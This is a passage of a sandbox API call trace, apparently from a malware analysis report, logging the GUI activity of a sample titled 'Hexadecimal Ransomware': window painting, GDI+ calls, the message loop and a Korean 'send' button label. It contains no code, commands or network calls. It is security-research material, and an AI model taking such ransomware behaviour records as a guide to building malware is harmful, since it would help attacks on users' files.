GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe1dc | out: lpwndpl=0x11fe1dc) returned 1 [0193.791] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe188 | out: lpRect=0x11fe188) returned 1 [0193.791] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0193.791] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0193.791] GetSystemMetrics (nIndex=42) returned 0 [0193.791] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fe030, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0193.791] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fe030) returned 0x16 [0193.791] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe090 | out: lpRect=0x11fe090) returned 1 [0193.791] GetCurrentObject (hdc=0x8a01081f, type=0x1) returned 0xb00017 [0193.791] GetCurrentObject (hdc=0x8a01081f, type=0x2) returned 0x900010 [0193.791] GetCurrentObject (hdc=0x8a01081f, type=0x7) returned 0xb050815 [0193.791] GetCurrentObject (hdc=0x8a01081f, type=0x6) returned 0x8a01c2 [0193.791] SaveDC (hdc=0x8a01081f) returned 2 [0193.791] GetNearestColor (hdc=0x8a01081f, color=0x0) returned 0x0 [0193.792] CreateSolidBrush (color=0x0) returned 0x23100826 [0193.792] FillRect (hDC=0x8a01081f, lprc=0x11fdf30, hbr=0x23100826) returned 1 [0193.792] DeleteObject (ho=0x23100826) returned 1 [0193.792] RestoreDC (hdc=0x8a01081f, nSavedDC=-1) returned 1 [0193.792] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0193.792] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0193.792] GetSystemMetrics (nIndex=42) returned 0 [0193.792] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0193.792] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0193.792] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe030 | out: lpRect=0x11fe030) returned 1 [0193.792] GetCurrentObject (hdc=0x8a01081f, type=0x1) returned 0xb00017 [0193.792] GetCurrentObject (hdc=0x8a01081f, type=0x2) returned 0x900010 [0193.792] GetCurrentObject (hdc=0x8a01081f, type=0x7) returned 0xb050815 [0193.793] GetCurrentObject (hdc=0x8a01081f, type=0x6) returned 0x8a01c2 [0193.793] SaveDC (hdc=0x8a01081f) returned 2 [0193.793] GetNearestColor (hdc=0x8a01081f, color=0x0) returned 0x0 [0193.793] CreateSolidBrush (color=0x0) returned 0x24100826 [0193.793] FillRect (hDC=0x8a01081f, lprc=0x11fded0, hbr=0x24100826) returned 1 [0193.793] DeleteObject (ho=0x24100826) returned 1 [0193.793] RestoreDC (hdc=0x8a01081f, nSavedDC=-1) returned 1 [0193.793] GetWindowTextLengthW (hWnd=0x202c8) returned 22 [0193.793] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0193.793] GetSystemMetrics (nIndex=42) returned 0 [0193.793] GetWindowTextW (in: hWnd=0x202c8, lpString=0x11fdfd0, nMaxCount=23 | out: lpString="Hexadecimal Ransomware") returned 22 [0193.793] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0xd, wParam=0x17, lParam=0x11fdfd0) returned 0x16 [0193.793] RestoreDC (hdc=0x8a01081f, nSavedDC=-1) returned 1 [0193.793] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01081f) returned 0x0 [0193.794] IsAppThemed () returned 0x1 [0193.794] GetThemeAppProperties () returned 0x3 [0193.794] GetThemeAppProperties () returned 0x3 [0193.794] IsAppThemed () returned 0x1 [0193.794] GetThemeAppProperties () returned 0x3 [0193.794] GetThemeAppProperties () returned 0x3 [0193.794] IsThemePartDefined () returned 0x1 [0193.794] GdipCreateRegion (region=0x11fe454) returned 0x0 [0193.794] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0193.794] GdipCreateMatrix (matrix=0x11fe454) returned 0x0 [0193.794] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a0f0) returned 0x0 [0193.794] GdipIsMatrixIdentity (matrix=0x6e1a0f0, result=0x11fe46c) returned 0x0 [0193.794] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0193.794] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593ea0) returned 0x0 [0193.794] LocalFree (hMem=0x1593ea0) returned 0x0 [0193.794] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0193.794] GdipGetMatrixElements (matrix=0x6e1a0f0, matrixOut=0x1593c38) returned 0x0 [0193.794] LocalFree (hMem=0x1593c38) returned 0x0 [0193.794] GdipDeleteMatrix (matrix=0x6e1a0f0) returned 0x0 [0193.794] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe494) returned 0x0 [0193.794] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe484) returned 0x0 [0193.794] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe484) returned 0x0 [0193.795] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0193.795] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe49c) returned 0x0 [0193.795] GetCurrentObject (hdc=0x8a01081f, type=0x1) returned 0xb00017 [0193.795] GetCurrentObject (hdc=0x8a01081f, type=0x2) returned 0x900010 [0193.795] GetCurrentObject (hdc=0x8a01081f, type=0x7) returned 0xb050815 [0193.795] GetCurrentObject (hdc=0x8a01081f, type=0x6) returned 0x8a01c2 [0193.795] SaveDC (hdc=0x8a01081f) returned 1 [0193.795] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2304081c [0193.795] GetClipRgn (hdc=0x8a01081f, hrgn=0x2304081c) returned 0 [0193.795] SelectClipRgn (hdc=0x8a01081f, hrgn=0x34040825) returned 2 [0193.795] DeleteObject (ho=0x2304081c) returned 1 [0193.795] DeleteObject (ho=0x34040825) returned 1 [0193.795] OffsetViewportOrgEx (in: hdc=0x8a01081f, x=0, y=0, lppt=0x334e764 | out: lppt=0x334e764) returned 1 [0193.795] IsAppThemed () returned 0x1 [0193.795] GetThemeAppProperties () returned 0x3 [0193.795] GetThemeAppProperties () returned 0x3 [0193.795] DrawThemeBackground () returned 0x0 [0193.796] RestoreDC (hdc=0x8a01081f, nSavedDC=-1) returned 1 [0193.796] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01081f) returned 0x0 [0193.796] GdipCreateRegion (region=0x11fe458) returned 0x0 [0193.796] GdipGetClip (graphics=0x6e19d80, region=0x6e1a060) returned 0x0 [0193.796] GdipCreateMatrix (matrix=0x11fe458) returned 0x0 [0193.796] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0193.796] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe470) returned 0x0 [0193.796] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0193.796] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593c38) returned 0x0 [0193.796] LocalFree (hMem=0x1593c38) returned 0x0 [0193.796] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593c38 [0193.796] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593c38) returned 0x0 [0193.796] LocalFree (hMem=0x1593c38) returned 0x0 [0193.796] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0193.796] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe498) returned 0x0 [0193.796] GdipIsInfiniteRegion (region=0x6e1a060, graphics=0x6e19d80, result=0x11fe488) returned 0x0 [0193.796] GdipGetRegionHRgn (region=0x6e1a060, graphics=0x6e19d80, hRgn=0x11fe488) returned 0x0 [0193.797] GdipDeleteRegion (region=0x6e1a060) returned 0x0 [0193.797] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe4a0) returned 0x0 [0193.797] GetCurrentObject (hdc=0x8a01081f, type=0x1) returned 0xb00017 [0193.797] GetCurrentObject (hdc=0x8a01081f, type=0x2) returned 0x900010 [0193.797] GetCurrentObject (hdc=0x8a01081f, type=0x7) returned 0xb050815 [0193.797] GetCurrentObject (hdc=0x8a01081f, type=0x6) returned 0x8a01c2 [0193.797] SaveDC (hdc=0x8a01081f) returned 1 [0193.797] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x35040825 [0193.797] GetClipRgn (hdc=0x8a01081f, hrgn=0x35040825) returned 0 [0193.797] SelectClipRgn (hdc=0x8a01081f, hrgn=0x2404081c) returned 2 [0193.798] DeleteObject (ho=0x35040825) returned 1 [0193.798] DeleteObject (ho=0x2404081c) returned 1 [0193.798] OffsetViewportOrgEx (in: hdc=0x8a01081f, x=0, y=0, lppt=0x334ea38 | out: lppt=0x334ea38) returned 1 [0193.798] IsAppThemed () returned 0x1 [0193.798] GetThemeAppProperties () returned 0x3 [0193.798] GetThemeAppProperties () returned 0x3 [0193.798] GetThemeBackgroundContentRect () returned 0x0 [0193.798] RestoreDC (hdc=0x8a01081f, nSavedDC=-1) returned 1 [0193.932] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01081f) returned 0x0 [0193.932] IsAppThemed () returned 0x1 [0193.932] GetThemeAppProperties () returned 0x3 [0193.932] GetThemeAppProperties () returned 0x3 [0193.933] GdipGetTextRenderingHint (graphics=0x6e19d80, mode=0x11fe5d4) returned 0x0 [0193.933] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5c0) returned 0x0 [0193.934] GetCurrentObject (hdc=0x8a01081f, type=0x1) returned 0xb00017 [0193.934] GetCurrentObject (hdc=0x8a01081f, type=0x2) returned 0x900010 [0193.934] GetCurrentObject (hdc=0x8a01081f, type=0x7) returned 0xb050815 [0193.934] GetCurrentObject (hdc=0x8a01081f, type=0x6) returned 0x8a01c2 [0193.934] SaveDC (hdc=0x8a01081f) returned 1 [0193.934] GetTextAlign (hdc=0x8a01081f) returned 0x0 [0193.934] GetTextColor (hdc=0x8a01081f) returned 0x0 [0193.934] GetCurrentObject (hdc=0x8a01081f, type=0x6) returned 0x8a01c2 [0193.935] GetObjectW (in: h=0x8a01c2, c=92, pv=0x11fe308 | out: pv=0x11fe308) returned 92 [0193.935] SelectObject (hdc=0x8a01081f, h=0x170a07ff) returned 0x8a01c2 [0193.935] GetBkMode (hdc=0x8a01081f) returned 2 [0193.935] SetBkMode (hdc=0x8a01081f, mode=1) returned 2 [0193.935] DrawTextExW (in: hdc=0x8a01081f, lpchText="전송하기", cchText=4, lprc=0x11fe3f0, format=0x2415, lpdtp=0x334edd8 | out: lpchText="전송하기", lprc=0x11fe3f0) returned 13 [0193.938] DrawTextExW (in: hdc=0x8a01081f, lpchText="전송하기", cchText=4, lprc=0x11fe554, format=0x2015, lpdtp=0x334edd8 | out: lpchText="전송하기", lprc=0x11fe554) returned 13 [0193.940] RestoreDC (hdc=0x8a01081f, nSavedDC=-1) returned 1 [0193.940] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01081f) returned 0x0 [0193.940] GetFocus () returned 0x0 [0193.940] IsAppThemed () returned 0x1 [0193.940] GetThemeAppProperties () returned 0x3 [0193.940] GetThemeAppProperties () returned 0x3 [0193.940] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe7a0) returned 0x0 [0193.940] BitBlt (hdc=0x60100ce, x=0, y=0, cx=64, cy=25, hdcSrc=0x8a01081f, x1=0, y1=0, rop=0xcc0020) returned 1 [0193.941] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01081f) returned 0x0 [0193.941] SelectPalette (hdc=0x60100ce, hPal=0x88000b, bForceBkgd=0) returned 0x1808081b [0193.941] SelectObject (hdc=0x8a01081f, h=0x85000f) returned 0xb050815 [0193.941] DeleteDC (hdc=0x8a01081f) returned 1 [0193.941] GdipDeleteGraphics (graphics=0x6e19d80) returned 0x0 [0193.941] EndPaint (hWnd=0x102d8, lpPaint=0x11fe744) returned 1 [0193.942] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0193.942] IsWindowUnicode (hWnd=0x202e6) returned 1 [0193.942] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0193.942] TranslateMessage (lpMsg=0x11fed00) returned 0 [0193.942] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0193.943] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0193.944] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0193.944] TranslateMessage (lpMsg=0x11fed00) returned 0 [0193.944] DispatchMessageA (lpMsg=0x11fed00) returned 0x0 [0193.944] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0193.944] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0193.944] WaitMessage () returned 1 [0194.080] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0194.081] IsWindowUnicode (hWnd=0x102ea) returned 1 [0194.081] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0194.081] TranslateMessage (lpMsg=0x11fed00) returned 0 [0194.081] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0194.081] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0194.081] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0194.081] WaitMessage () returned 1 [0194.189] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0194.189] IsWindowUnicode (hWnd=0x202e6) returned 1 [0194.189] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0194.189] TranslateMessage (lpMsg=0x11fed00) returned 0 [0194.189] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0194.191] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0194.191] IsWindowUnicode (hWnd=0x202e6) returned 1 [0194.191] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0194.191] TranslateMessage (lpMsg=0x11fed00) returned 0 [0194.191] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0194.191] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0194.192] IsWindowUnicode (hWnd=0x202e6) returned 1 [0194.192] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0194.192] TranslateMessage (lpMsg=0x11fed00) returned 0 [0194.192] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0194.192] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0194.192] IsWindowUnicode (hWnd=0x202e6) returned 1 [0194.192] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0194.192] TranslateMessage (lpMsg=0x11fed00) returned 0 [0194.192] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0194.192] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0194.193] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0194.193] WaitMessage () returned 1 [0214.312] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.315] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x46, wParam=0x0, lParam=0x11febd4) returned 0x0 [0214.321] GetWindowPlacement (in: hWnd=0x202c8, lpwndpl=0x11fe900 | out: lpwndpl=0x11fe900) returned 1 [0214.321] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x47, wParam=0x0, lParam=0x11febd4) returned 0x0 [0214.321] GetClientRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0214.321] GetWindowRect (in: hWnd=0x202c8, lpRect=0x11fe8b0 | out: lpRect=0x11fe8b0) returned 1 [0214.324] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x1c, wParam=0x1, lParam=0xca4) returned 0x0 [0214.324] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1c, wParam=0x1, lParam=0xca4) returned 0x0 [0214.324] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x202c8, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0214.334] GetFocus () returned 0x0 [0214.334] SetFocus (hWnd=0x102d8) returned 0x0 [0214.398] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0214.400] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0214.400] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0214.401] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0214.401] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0214.401] GetStockObject (i=5) returned 0x900015 [0214.402] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0214.402] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0xd, wParam=0x5, lParam=0x1591be8) returned 0x4 [0214.402] GetDlgItem (hDlg=0x202c8, nIDDlgItem=66264) returned 0x102d8 [0214.402] SendMessageW (hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fe234) returned 0x0 [0214.402] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x202b, wParam=0x102d8, lParam=0x11fe234) returned 0x0 [0214.402] InvalidateRect (hWnd=0x102d8, lpRect=0x0, bErase=0) returned 1 [0214.409] IsWindowUnicode (hWnd=0x102d8) returned 1 [0214.409] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.409] GetKeyState (nVirtKey=16) returned 0 [0214.409] GetKeyState (nVirtKey=17) returned 0 [0214.409] GetKeyState (nVirtKey=18) returned -128 [0214.409] TranslateMessage (lpMsg=0x11fed00) returned 1 [0214.410] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.410] GetKeyState (nVirtKey=16) returned 0 [0214.410] GetKeyState (nVirtKey=17) returned 0 [0214.410] GetKeyState (nVirtKey=18) returned -128 [0214.410] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x105, wParam=0x1b, lParam=0xe0010001) returned 0x0 [0214.410] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.410] IsWindowUnicode (hWnd=0x102d8) returned 1 [0214.410] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.411] GetKeyState (nVirtKey=16) returned 0 [0214.411] GetKeyState (nVirtKey=17) returned 0 [0214.411] GetKeyState (nVirtKey=18) returned 0 [0214.411] TranslateMessage (lpMsg=0x11fed00) returned 1 [0214.411] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.411] GetKeyState (nVirtKey=16) returned 0 [0214.411] GetKeyState (nVirtKey=17) returned 0 [0214.411] GetKeyState (nVirtKey=18) returned 0 [0214.411] CallWindowProcW (lpPrevWndFunc=0x7412e800, hWnd=0x102d8, Msg=0x101, wParam=0x12, lParam=0xc0380001) returned 0x0 [0214.411] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.412] IsWindowUnicode (hWnd=0x102d8) returned 1 [0214.412] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.412] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.412] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.412] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.413] IsWindowUnicode (hWnd=0x102d8) returned 1 [0214.413] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0214.413] TranslateMessage (lpMsg=0x11fed00) returned 0 [0214.413] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0214.414] BeginPaint (in: hWnd=0x102d8, lpPaint=0x11fe748 | out: lpPaint=0x11fe748) returned 0xf0105ee [0214.414] SelectPalette (hdc=0xf0105ee, hPal=0x1808081b, bForceBkgd=1) returned 0x88000b [0214.414] CreateCompatibleDC (hdc=0xf0105ee) returned 0x8a01082e [0214.414] SelectObject (hdc=0x8a01082e, h=0xb050815) returned 0x85000f [0214.415] GdipCreateFromHDC (hdc=0x8a01082e, graphics=0x11fe760) returned 0x0 [0214.416] GdipTranslateWorldTransform (graphics=0x6e19d80, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0214.416] GdipSetClipRectI (graphics=0x6e19d80, x=0, y=0, width=64, height=25, combineMode=0x0) returned 0x0 [0214.417] GdipCreateMatrix (matrix=0x11fe7a8) returned 0x0 [0214.417] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a060) returned 0x0 [0214.417] GdipIsMatrixIdentity (matrix=0x6e1a060, result=0x11fe7c0) returned 0x0 [0214.417] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0214.417] GdipGetMatrixElements (matrix=0x6e1a060, matrixOut=0x1593ea0) returned 0x0 [0214.418] LocalFree (hMem=0x1593ea0) returned 0x0 [0214.418] GdipDeleteMatrix (matrix=0x6e1a060) returned 0x0 [0214.418] GdipCreateRegion (region=0x11fe7a8) returned 0x0 [0214.418] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0214.418] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe7b4) returned 0x0 [0214.418] GdipSaveGraphics (graphics=0x6e19d80, state=0x11fe7e0) returned 0x0 [0214.418] GdipRestoreGraphics (graphics=0x6e19d80, state=0xfd8b0dbd) returned 0x0 [0214.418] GdipDeleteRegion (region=0x6e1a090) returned 0x0 [0214.419] GdipGetDC (graphics=0x6e19d80, hdc=0x11fe5cc) returned 0x0 [0214.419] GetCurrentObject (hdc=0x8a01082e, type=0x1) returned 0xb00017 [0214.419] GetCurrentObject (hdc=0x8a01082e, type=0x2) returned 0x900010 [0214.419] GetCurrentObject (hdc=0x8a01082e, type=0x7) returned 0xb050815 [0214.419] GetCurrentObject (hdc=0x8a01082e, type=0x6) returned 0x8a01c2 [0214.420] SaveDC (hdc=0x8a01082e) returned 1 [0214.420] GetNearestColor (hdc=0x8a01082e, color=0x0) returned 0x0 [0214.420] GetNearestColor (hdc=0x8a01082e, color=0x0) returned 0x0 [0214.420] GetNearestColor (hdc=0x8a01082e, color=0x0) returned 0x0 [0214.420] GetNearestColor (hdc=0x8a01082e, color=0x989898) returned 0x989898 [0214.420] GetNearestColor (hdc=0x8a01082e, color=0x0) returned 0x0 [0214.420] GetNearestColor (hdc=0x8a01082e, color=0x7f7f7f) returned 0x7f7f7f [0214.420] GetNearestColor (hdc=0x8a01082e, color=0x989898) returned 0x989898 [0214.420] GetNearestColor (hdc=0x8a01082e, color=0x0) returned 0x0 [0214.420] GetNearestColor (hdc=0x8a01082e, color=0x0) returned 0x0 [0214.420] RestoreDC (hdc=0x8a01082e, nSavedDC=-1) returned 1 [0214.421] GdipReleaseDC (graphics=0x6e19d80, hdc=0x8a01082e) returned 0x0 [0214.421] IsAppThemed () returned 0x1 [0214.422] GetThemeAppProperties () returned 0x3 [0214.422] GetThemeAppProperties () returned 0x3 [0214.422] IsAppThemed () returned 0x1 [0214.422] GetThemeAppProperties () returned 0x3 [0214.422] GetThemeAppProperties () returned 0x3 [0214.422] DrawTextExW (in: hdc=0x450107b6, lpchText="전송하기", cchText=4, lprc=0x11fe488, format=0x2415, lpdtp=0x334f77c | out: lpchText="전송하기", lprc=0x11fe488) returned 13 [0214.425] IsAppThemed () returned 0x1 [0214.425] GetThemeAppProperties () returned 0x3 [0214.425] GetThemeAppProperties () returned 0x3 [0214.425] IsAppThemed () returned 0x1 [0214.425] GetThemeAppProperties () returned 0x3 [0214.425] GetThemeAppProperties () returned 0x3 [0214.425] GetFocus () returned 0x102d8 [0214.425] IsAppThemed () returned 0x1 [0214.426] GetThemeAppProperties () returned 0x3 [0214.426] GetThemeAppProperties () returned 0x3 [0214.426] IsAppThemed () returned 0x1 [0214.426] GetThemeAppProperties () returned 0x3 [0214.426] GetThemeAppProperties () returned 0x3 [0214.426] IsThemePartDefined () returned 0x1 [0214.426] IsAppThemed () returned 0x1 [0214.426] GetThemeAppProperties () returned 0x3 [0214.426] GetThemeAppProperties () returned 0x3 [0214.426] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0214.426] IsAppThemed () returned 0x1 [0214.426] GetThemeAppProperties () returned 0x3 [0214.426] GetThemeAppProperties () returned 0x3 [0214.426] IsAppThemed () returned 0x1 [0214.426] GetThemeAppProperties () returned 0x3 [0214.426] GetThemeAppProperties () returned 0x3 [0214.426] IsThemePartDefined () returned 0x1 [0214.426] GdipCreateRegion (region=0x11fe4d0) returned 0x0 [0214.426] GdipGetClip (graphics=0x6e19d80, region=0x6e1a090) returned 0x0 [0214.427] GdipCreateMatrix (matrix=0x11fe4d0) returned 0x0 [0214.427] GdipGetWorldTransform (graphics=0x6e19d80, matrix=0x6e1a120) returned 0x0 [0214.427] GdipIsMatrixIdentity (matrix=0x6e1a120, result=0x11fe4e8) returned 0x0 [0214.427] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ea0 [0214.427] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ea0) returned 0x0 [0214.427] LocalFree (hMem=0x1593ea0) returned 0x0 [0214.427] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x1593ed8 [0214.427] GdipGetMatrixElements (matrix=0x6e1a120, matrixOut=0x1593ed8) returned 0x0 [0214.427] LocalFree (hMem=0x1593ed8) returned 0x0 [0214.427] GdipDeleteMatrix (matrix=0x6e1a120) returned 0x0 [0214.427] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe510) returned 0x0 [0214.427] GdipIsInfiniteRegion (region=0x6e1a090, graphics=0x6e19d80, result=0x11fe500) returned 0x0 [0214.427] GdipGetRegionHRgn (region=0x6e1a090, graphics=0x6e19d80, hRgn=0x11fe500) returned 0x0 [0214.427] GdipDeleteRegion 